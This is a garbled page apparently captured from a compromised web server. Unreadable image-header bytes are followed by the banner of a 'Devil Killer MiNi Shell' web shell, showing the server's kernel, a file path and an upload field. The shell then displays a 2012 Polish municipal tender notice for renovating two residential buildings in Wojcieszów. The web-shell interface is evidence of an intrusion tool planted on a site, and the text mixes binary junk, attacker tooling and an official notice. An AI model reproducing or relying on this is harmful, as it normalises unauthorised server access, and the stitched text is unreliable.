JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120723/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120723/265068-N-2012.html

<p class="kh_header"><b>Wojcieszów: Rewitalizacja miasta Wojcieszów poprzez renowację budynków mieszkalnych</b><br>
<b>Numer ogłoszenia: 265068 - 2012; data zamieszczenia: 23.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wojcieszów , ul. Pocztowa 1, 59-550 Wojcieszów, woj. dolnośląskie, tel. 075 7512230, 7512373, faks 075 7512280.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wojcieszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja miasta Wojcieszów poprzez renowację budynków mieszkalnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty remontowe w budynkach przy ul. Bolesława Chrobrego 5a, ul. Gminna 8 w Wojcieszowie. 
2.	Słownik CPV
45262100-2   - Rusztowania 
45260000-7   - Roboty dekarsko-blacharskie
45262500-6   - Roboty murarsko-tynkarskie
45261410-1     Izolacje dachu
45443000-4   - Roboty elewacyjne
45420000-7   - Wymiana stolarki 
45111220-6   - Roboty w zakresie usuwania gruzu


3.Informacje ogólne
Część 1
3.1.LOKALIZACJA : 
Budynek mieszkalny  nr 5a ,posadowiony w  przy ul. Bolesława Chrobrego Wojcieszowie. Skierowany frontem w kierunku zachodnim
2. Ogólna charakterystyka budynku:
Budynek mieszkalny, wolnostojący, wielorodzinny o konstrukcji :   
        1. Ściany murowane-metodą tradycyjną z cegły i kamienia
        2. Stropy :
            - nad parterem -sklepienia łukowe 
            - nad piętrem - drewniane  
        3.  Dach dwuspadowy z lukernami, krokwiowy - o konstrukcji drewnianej.
        4. Stolarka :
           - drzwiowa- stan dostateczny. W związku z robotami elewacyjnymi należy wymienić drzwi wejściowe do budynku od strony  zachodniej
           - stolarka okienna - stan dostateczny . Wymienić okna na kl.schodowej  
       5. Elementy wyposażenia dachu jak : Kominy ,rynny, rury spustowe ,włazy dachowe czy ławy kominiarskie w znacznym stopniu  nie nadają  się  do dalszej eksploatacji.
    6. Elewacja:  
Tynki zewnętrzne nakrapiane - liczne, widoczne ślady odparzeń tynku  spowodowane przez lata eksploatacji oraz działanie czynników  atmosferycznych .Cokół tynkowany -w znacznym stopniu zniszczony. Opaska betonowa wokół                                         budynku-skorodowana przez wilgoć oraz długie lata eksploatacji.
7.Droga dojazdowa asfaltowa [bezpośrednio z ulicy Bolesława Chrobrego] oraz dwa wjazdy-wyjazdy drogą                                   gruntowa-utwardzoną, prowadzącą bezpośrednio z ul. Bolesława Chrobrego 
ZAKRES ROBÓT:
Zakres robót został opracowany na podstawie przeprowadzonego przeglądu stanu technicznego budynku  oraz w uzgodnieniu  z Zamawiającym:
1. Roboty dekarsko-blacharskie :
- roboty rozbiórkowe- pokrycia dachu, ołacenia i elementów wyposażenia dachu [wiatrownice, pasy nadrynnowe itd.]
- roboty dekarskie - wykonanie nowego pokrycia z dachówki karpiówki wraz z robotami towarzyszącymi [rynny,rury                                            spustowe ,itd]. W związku z planowanym ociepleniem ścian w/w budynku, należy na ścianach szczytowych przedłużyć   nowe łaty pod pokrycie o 20cm po każdej stronie szczytów
- roboty blacharskie - pasy nadrynnowe, kominy, wiatrownice
2.Roboty murarsko-tynkarskie: 
-przebudowa kominów od poziomu strychu z cegły pełnej kl.15 oraz powyżej dachu  z cegły klinkierowej pełnej, spoinowane
-zbicie tynków zewnętrznych-nakrapianych
- remont schodów wejściowych do budynku
- zbicie tynków cokołu oraz wykonanie nowej faktury cokołu z mas lastrykowych -płukanych
3. Wymiana stolarki okiennej i drzwiowej:
- wymiana stolarki drzwiowej na kl.schodowej - 2,0szt
- wymiana okna na kl.schodowej -2,0 szt
- remont schodów 
[częściowe rozebranie i reperacja istniejących wykonanie nowych z betonu i oblicowanie płytkami granitowymi]
-remont istniejącego cokołu -zbicie tynku na cokole oraz wykonanie nowego z mas lastrikowych
4. Izolacja dachu :
W związku z faktu że istnieje w budynku poddasze użytkowo-mieszkalne należy w trakcie robót dachowych wykonać izolację  połaci dachu z wełny mineralnej gr.min.10 cm.
 5.Roboty elewacyjne : 
- wykonanie ocieplenia ścian zewnętrznych oraz lukarn /styropian gr.10cm/ metodą lekko-mokrą wraz z wykonaniem faktury zewnętrznej tj. tynk cienkowarstwowy  w kolorze jasnym. W trakcie  wykonywania w/w robót należy zachować istniejącą architekturę zewnętrzną budynku.
- malowanie farbami olejnymi  istniejącej stolarki okiennej
6.Roboty w zakresie usuwania gruzu : 
- transport gruzu po w/w robotach budowlanych
Część 2
3.2.LOKALIZACJA :
Budynek mieszkalny  nr 8, posadowiony w  przy ul. Gminnej w Wojcieszowie. Frontem usytuowany w kierunku wschodnim.
2. Ogólna charakterystyka budynku:
Budynek mieszkalny, wolnostojący, podpiwniczony ,wielorodzinny. Ściany z cegły murowane- metodą tradycyjną. Stropy drewniane ,dach dwuspadowy z luxernami od strony wschodniej, krokwiowo-jętkowy o konstrukcji drewnianej. Pokrycie dachu-dachówka karpiówka ,widoczne ślady zacieków ,spowodowane brakiem szczelności pokrycia.
Elewacja:  
Tynki zewnętrzne nakrapiane -   stan dobry
Stolarka okienna i drzwiowa w lokalach mieszkalnych w stanie dostatecznym
Teren wokół budynku: Istniejąca opaska betonowa-stan dobry. Droga dojazdowa  -asfaltowa i  wewnętrzna - utwardzona - st.dobry

ZAKRES ROBÓT:
Zakres robót został opracowany na podstawie przeprowadzonego przeglądu stanu technicznego budynku  oraz w uzgodnieniu z Zamawiającym:
1. Rusztowania - montaż i demontaż rusztowań zewnętrznych oraz przy kominach
2. Roboty dekarsko-blacharskie :
2.1. Odtworzenie istniejącego pokrycia:
-roboty rozbiórkowe- pokrycia dachu, ołacenia i elementów wyposażenia dachu [wiatrownice, ławy kominiarskie ,rynny, rury  spustowe itd.]
- wykonanie wstępnego krycia dachu z folii wysokoparoprzepuszczalnej
-roboty dekarskie - wykonanie nowego pokrycia z dachówki ceramicznej /karpiówka/ wraz z robotami towarzyszącymi  [rynny, rury spustowe ,itd]
- roboty blacharskie - pasy nadrynnowe, kominy, wiatrownice
 3. Roboty izolacyjne:
3.1 W trakcie wykonywania przełożenia pokrycia dachu/po jego wykonaniu / należy wykonać izolację cieplną połaci dachu z wełny mineralnej gr.min.15cm.W.w wełnę należy ułożyć między krokwiami 
4.Roboty murarsko-tynkarskie: 
-przebudowa kominów od poziomu strychu wraz z wykonaniem tynków kat.II. Ponad dachem z cegły klinkierowej ,spoinowane
5.Roboty w zakresie usuwania gruzu : 
- transport gruzu po w/w robotach budowlanych
4. Szczegółowy zakres prac określa Przedmiar stanowiący załącznik nr 8 do SIWZ, oraz Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych stanowiąca załącznik nr 9.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.21.00-2, 45.26.00.00-7, 45.26.25.00-6, 45.26.14.10-1, 45.44.30.00-4, 45.42.00.00-7, 45.11.12.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> XVI. Wadium
1.Ustala się wadium w wysokości: 
Część I 5000  zł
Część II 1000 zł
Wykonawca wnosi wadium w jednej lub kilku następujących formach:
- pieniężnej
-poręczenia bankowego lub poręczenia spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
-gwarancji bankowej;
-gwarancji ubezpieczeniowej lub 
-poręczenia udzielanego przez podmioty, o których mowa w art. 6b ust. 5 pkt.2 ustawy z dnia 9 listopada 2000 r.                o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości(Dz.U. Nr 109, poz. 1158 z późniejszymi zmianami). 
2. Wadium wnoszone w pieniądzu należy zgodnie z art. 45 ust 7 ustawy Prawo zamówień publicznych wpłacić wyłącznie przelewem na rachunek bankowy Zamawiającego nr  08 8658 1019 0000 1964 2000 0050 w Powiatowym Banku Spółdzielczym w Złotoryi oddział Świerzawa w takim terminie, aby najpóźniej przed upływem terminu składania ofert - określonym w pkt XX SIWZ - środki finansowe z tytułu wadium znajdowały się na wskazanym wyżej  rachunku Zamawiającego. Zamawiający stwierdzi wniesienie wadium na podstawie informacji banku prowadzącego w/w rachunek.

3. Pozostałe, niepieniężne formy wadium wymienione w pkt.1 należy w formie oryginału załączyć do oferty 
4. Gwarancja bankowa lub ubezpieczeniowa, stanowiąca formę wniesienia wadium, winna spełniać co najmniej następujące wymogi (pod rygorem wykluczenia wykonawcy):
a) ustalać beneficjenta gwarancji, tj. Gmina Wojcieszów 
b) określać kwotę gwarantowaną w zł. (ustaloną w SIWZ),
c) określać termin ważności (wynikający z SIWZ),
d) określać przedmiot gwarancji (wynikający z SIWZ),
e) być gwarancją nie odwoływalną, bezwarunkową, płatną na każde żądanie.



Uwaga!  
Z treści gwarancji bankowej lub ubezpieczeniowej powinno wynikać uprawnienie Zamawiającego do zatrzymania wadium jeżeli wystąpią przesłanki opisane w art. 46  ust 4a i 5 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych ( Dz. U. z 2010 r. nr 113, poz. 759)  , w szczególności uprawnienie Zamawiającego do zatrzymania wadium wraz z odsetkami jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 ustawy Prawo zamówień publicznych, lub pełnomocnictw.

41. Do wadium wniesionego w formie poręczenia wymagania opisane w pkt 4 stosuje się odpowiednio

5. W przypadku nie wniesienia wadium na warunkach określonych w pkt 1-41 Wykonawca zostanie wykluczony z dalszego postępowania, a złożona przez niego oferta zostanie odrzucona.

6.Zwrot wadium nastąpi na zasadach określonych w art. 46 ustawy z dnia 29 stycznia 2004 r.- Prawo zamówień publicznych ( Dz. U. z 2010 r. nr 113, poz. 759)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3. Zrealizowali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: 
Dla części I Jedna robota polegające na wymianie pokrycia dachu o powierzchni nie mniejszej niż  400 m2 , Jedna robota  polegające na wykonaniu elewacji - ociepleniu ścian styropianem o powierzchni nie mniejszej  400m2. 
Dla części II Jedna robota polegające na wymianie pokrycia dachu o powierzchni nie mniejszej niż  150 m2  
7. Oświadczenia i dokumenty będą oceniane pod względem formalno-prawnym, pod względem ich aktualności i treści, a także czy informacje w nich zawarte potwierdzają spełnienie wymagań Zamawiającego. Sposób dokonywania oceny spełnienia warunków wymaganych od wykonawców będzie oparty na zasadzie: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.Wykażą, iż dysponują przynajmniej jedną osobą  posiadającą następujące kwalifikacje 
Kierownik Budowy (1 osoba):

Kwalifikacje: uprawnienia, o których mowa w ustawie u.p.b. oraz w Rozporządzeniu Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83, poz.578 z późn. zm.) lub odpowiadające im ważne uprawnia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub odpowiednich przepisów obowiązujących na terenie kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ, zgodnie z ustawą z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej 
(tj. Dz. U. z 2008 r. Nr 63, poz.394) lub zamierzający świadczyć usługi transgraniczne w rozumieniu przepisów tej ustawy oraz art. 20a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa lub urbanistów (Dz. U. z 2001 Nr 5, poz. 42 z późn. zm.) do kierowania robotami w specjalności konstrukcyjno-budowlanej.
7. Oświadczenia i dokumenty będą oceniane pod względem formalno-prawnym, pod względem ich aktualności i treści, a także czy informacje w nich zawarte potwierdzają spełnienie wymagań Zamawiającego. Sposób dokonywania oceny spełnienia warunków wymaganych od wykonawców będzie oparty na zasadzie: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oferta na wykonanie zamówienia publicznego (Zał. Nr 1 do SIWZ)
2. Dokumenty potwierdzające uprawnienia osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.
3. Harmonogram rzeczowo-finansowy przed podpisaniem umowy do uzgodnienia z zamawiający. 
4. Przed podpisaniem umowy wykonawca jest zobowiązany dostarczyć zamawiającemu kosztorys ofertowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>XXXI. Zmiana umowy
1)	Zamawiający dopuszcza zmianę umowy w formie aneksu, jeżeli zajdzie potrzeba  w sytuacji zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 14 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta może spowodować wydłużenie terminu wykonania prac i nie spowoduje zmiany wynagrodzenia wykonawcy. Inicjatorem tej zmiany może być zamawiający lub wykonawca.
2)	Zamawiający dopuszcza zmianę kierownika robót, w sytuacji zdarzeń losowych uniemożliwiających mu pełnienie jego funkcji z zastrzeżeniem że taka zmiana musi nastąpić na osoby, które spełniają warunki określone w SIWZ. Inicjatorem tej zmiany może być wykonawca. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 3 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta nie wpłynie na termin wykonania prac i nie spowoduje zmiany wynagrodzenia wykonawcy.
3)	Zamawiający dopuszcza zmianę umowy, w sytuacji rezygnacji z wykonania części prac. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 14 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta nie spowoduje wydłużenie terminu wykonania prac i  nie spowoduje zmiany wynagrodzenia wykonawcy. Inicjatorem tej zmiany może być zamawiający. 
4)	Zamawiający dopuszcza zmianę umowy w sytuacji:
a)	wystąpienia nieprzewidzianych warunków i zjawisk atmosferycznych (kataklizmy),
b)	konieczności wykonania zamiennej dokumentacji projektowej,
c)	konieczności przeprowadzenia uzgodnień prawnych lub technicznych,
d)	wstrzymania budowy przez właściwy organ z przyczyn nie zawinionych przez Wykonawcę robót budowlanych, np.: dokonanie odkrywki archeologicznej, odkrycie niewybuchu, itp.,
e)	w przypadku stwierdzenia przez specjalistę ornitologa i chiropterologa po dokonaniu przez nich przeglądu w budynku przed przystąpieniem do wykonania prac pod kątem występowania miejsc gniazdowania i schronień zwierząt (ptaków i nietoperzy) prace prowadzone będą w terminach wyznaczonych przez w/w specjalistów lub zostaną zastosowane czynności przez nich wskazane. 
f)	wystąpienia siły wyższej np.: trąby powietrznej, pożaru, powodzi,

Inicjatorem tej zmiany może być wykonawca lub zamawiający. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 4 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta wpłynie na termin wykonania prac i nie spowoduje zmiany wynagrodzenia wykonawcy.
5)	Zamawiający dopuszcza zamiany harmonogramu finansowo-rzeczowego. Inicjatorem zmiany może być wykonawca lub zamawiający. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 4 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian.  Zmiana ta nie spowoduje zmiany wynagrodzenia wykonawcy i może spowodować zmianę terminu wykonania prac.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wojcieszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Wojcieszów, ul. Pocztowa 1, 59-550 Wojcieszów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2012 godzina 11:15, miejsce: Urząd Miasta Wojcieszów, ul. Pocztowa 1, 59-550 Wojcieszów - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest realizowane i współfinansowane ze środków EFRR w ramach RPO WD.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Roboty remontowe budynku mieszkalnego nr 5a przy ul. Bolesława Chrobrego w Wojcieszowie.</p>
